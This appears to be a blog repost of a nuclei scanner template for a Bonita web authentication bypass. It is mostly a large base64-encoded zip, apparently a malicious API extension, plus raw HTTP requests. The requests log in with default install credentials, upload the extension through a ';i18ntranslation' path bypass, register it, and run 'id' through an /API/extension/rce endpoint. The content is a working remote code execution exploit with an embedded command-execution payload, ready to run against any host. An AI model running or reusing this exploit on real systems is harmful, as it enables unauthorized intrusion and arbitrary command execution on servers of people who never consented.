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')}}"

http:
  - raw:
      - |
        POST /bonita/loginservice HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Connection: close
        Content-Length: 39

        username=install&password=install&_l=en
    extractors:
      - type: regex
        name: jsession
        internal: true
        part: header
        regex:
          - 'JSESSIONID=([A-Z0-9]+)'
      - type: regex
        name: api_token
        internal: true
        part: header
        regex:
          - 'X-Bonita-API-Token=([0-9a-f\-]+)'

  - raw:
      - |
        POST /bonita/API/pageUpload;i18ntranslation?action=add HTTP/1.1
        Host: {{Hostname}}
        Cookie: JSESSIONID={{jsession}}; X-Bonita-API-Token={{api_token}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
        Connection: close

        ------WebKitFormBoundary
        Content-Disposition: form-data; name="file"; filename="api_extension.zip"
        Content-Type: application/octet-stream

        {{zipdata}}
        ------WebKitFormBoundary--

    extractors:
      - type: json
        name: tempPath
        json:
          - ".tempPath"
        internal: true

  - raw:
    - |
      POST /bonita/API/portal/page/;i18ntranslation HTTP/1.1
      Host: {{Hostname}}
      Cookie: JSESSIONID={{jsession}}; X-Bonita-API-Token={{api_token}}
      Content-Type: application/json;charset=UTF-8
      Connection: close

      {
        "contentName": "api_extension.zip",
        "pageZip": "{{tempPath}}"
      }

  - raw:
    - |
      GET /bonita/API/extension/rce?p=0&c=1&cmd=id HTTP/1.1
      Host: {{Hostname}}
      Cookie: JSESSIONID={{jsession}}; X-Bonita-API-Token={{api_token}}
      Accept: application/json
      Connection: close

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
        condition: and


Github Poc
#projectdiscovery/nuclei-templates:github issues #权限绕过
Bonita Web Authentication/Authorization Bypass Vulnerability
http://example.com/2025/07/22/github_2362867704/
作者
lianccc
发布于
2025年7月22日
许可协议